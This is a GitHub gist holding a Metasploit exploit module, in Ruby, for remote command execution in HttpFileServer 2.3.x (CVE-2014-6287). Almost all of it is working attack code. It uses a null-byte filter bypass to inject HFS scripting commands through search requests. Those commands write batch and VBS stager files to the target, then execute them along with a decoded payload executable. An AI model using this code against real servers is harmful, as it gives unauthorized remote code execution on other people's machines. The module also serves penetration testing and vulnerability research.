Created
September 15, 2014 14:22
-
-
Save mubix/b855d8045a6112a937a7 to your computer and use it in GitHub Desktop.
HFS Script Injection module via https://github.com/rapid7/metasploit-framework/pull/3793
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http//metasploit.com/donload | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Reank = NormalRanking | |
include Msf::Exploit::Remote::HttpClient | |
include Msf::Exploit::EXE | |
include Msf::Exploit::CmdStager | |
def initialize(info={}) | |
super(update_info(info, | |
'Name' => "HttpFileServer 2.3.x Remote Command Execution", | |
'Description' => %q{ | |
HFS is vulnerable to remote command execution attack due to a poor regex in the file | |
ParserLib.pas. This module exploit the HFS scripting commands by using '%00' to bypass | |
the filtering. | |
}, | |
'License' => MSF_LICENSE, | |
'Author' => | |
[ | |
'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery | |
'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module | |
], | |
'References' => | |
[ | |
['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], | |
['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'], | |
['CVE', '2014-6287'], | |
], | |
'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, | |
# Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600] | |
'Platform' => 'win', | |
'Targets' => | |
[ | |
[ 'Automatic', {} ], | |
], | |
'Privileged' => false, | |
'DefaultOptions' => | |
{ | |
'CMDSTAGER::DECODER' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot") | |
}, | |
'DisclosureDate' => "Sep 14 2014", | |
'DefaultTarget' => 0)) | |
register_options( | |
[ | |
OptString.new('TARGETURI', [true, 'The path of the web application', '/']), | |
OptString.new('SAVE_PATH', [true, 'Target writable path', 'c:\\']), | |
], self.class) | |
end | |
def check | |
res = send_request_raw({ | |
'method' => 'GET', | |
'uri' => "#{datastore['TARGETURI']}" | |
}) | |
if res.headers['Server'] =~ /HFS 2.3/ | |
return Exploit::CheckCode::Detected | |
else | |
return Exploit::CheckCode::Safe | |
end | |
end | |
def get_vbs_string(str) | |
vbs_str = "" | |
str.each_byte { |b| | |
vbs_str << "Chr(#{b})+" | |
} | |
return vbs_str.chomp("+") | |
end | |
def merge_b64(filename) | |
filename = datastore['SAVE_PATH'] + filename | |
basename = filename.split('.')[0] | |
contents = "cmd%20/c%20copy%20#{basename}.%2A.b64%20#{filename}" | |
send_request_cgi({ | |
'method' => 'GET', | |
'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.save|#{basename}.bat|#{contents}%0D%0A.}" | |
}) | |
cmd = "#{basename}.bat" | |
send_request_cgi({ | |
'method' => 'GET', | |
'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec|#{cmd}.}" | |
}) | |
end | |
def merge_vbs(filename) | |
basename = filename.split('.')[0] | |
contents = "cmd%20/c%20copy%20#{basename}.%2A.vbs%20#{filename}" | |
send_request_cgi({ | |
'method' => 'GET', | |
'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.save|#{basename}.bat|#{contents}%0D%0A.}" | |
}) | |
cmd = "#{basename}.bat" | |
send_request_cgi({ | |
'method' => 'GET', | |
'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec|#{cmd}.}" | |
}) | |
end | |
def execute_cmdstager_begin(opts) | |
var_decoded = @stager_instance.instance_variable_get(:@var_decoded) | |
var_encoded = @stager_instance.instance_variable_get(:@var_encoded) | |
decoded_file = "#{var_decoded}.exe" | |
encoded_file = "#{var_encoded}.b64" | |
vbsname = "" | |
counter = 0 | |
@cmd_list.each_with_index do |command, indexi| | |
command.gsub!(/CHRENCFILE/, get_vbs_string(encoded_file)) | |
command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file)) | |
command.gsub!("Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37)", get_vbs_string("#{datastore['SAVE_PATH']}")) | |
list = command.split(' & ') | |
list.each do |cmdlet, indext| | |
if cmdlet =~ /^echo\ /i | |
filenum = counter.to_s.rjust(3, '0') | |
counter += 1 | |
if cmdlet.split('>>')[1] =~ /\.vbs$/i | |
vbsname = cmdlet.split('>>')[1] | |
end | |
filename = "#{cmdlet.split('>>')[1].split('.')[0]}.#{filenum}.#{cmdlet.split('>>')[1].split('.')[1]}" | |
contents = cmdlet.split('echo ')[1].split('>>')[0] | |
if contents != nil | |
contents.gsub!(/\ /, '%20') | |
contents.gsub!(/\+/, '%2B') | |
contents.gsub!(/\=/, '%3D') | |
end | |
send_request_cgi({ | |
'method' => 'GET', | |
'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.save|#{filename}|#{contents}%0D%0A.}" | |
}) | |
end | |
end | |
end | |
merge_b64(encoded_file) | |
merge_vbs(vbsname) | |
send_request_cgi({ | |
'method' => 'GET', | |
'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec|wscript.exe%20#{vbsname}.}" | |
}) | |
send_request_cgi({ | |
'method' => 'GET', | |
'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec|#{datastore['SAVE_PATH']}\\#{var_decoded}.exe.}" | |
}) | |
end | |
def execute_command(cmd, opts = {}) | |
=begin | |
send_request_cgi({ | |
'method' => 'GET', | |
'uri' => "/?search=#{rand_text_alpha(rand(10)+5)}%00{.exec|cmd%20/c%20#{command}.}" | |
}) | |
=end | |
end | |
def exploit | |
execute_cmdstager({:linemax => 1500, :temp => "C:\\temp\\"}) | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment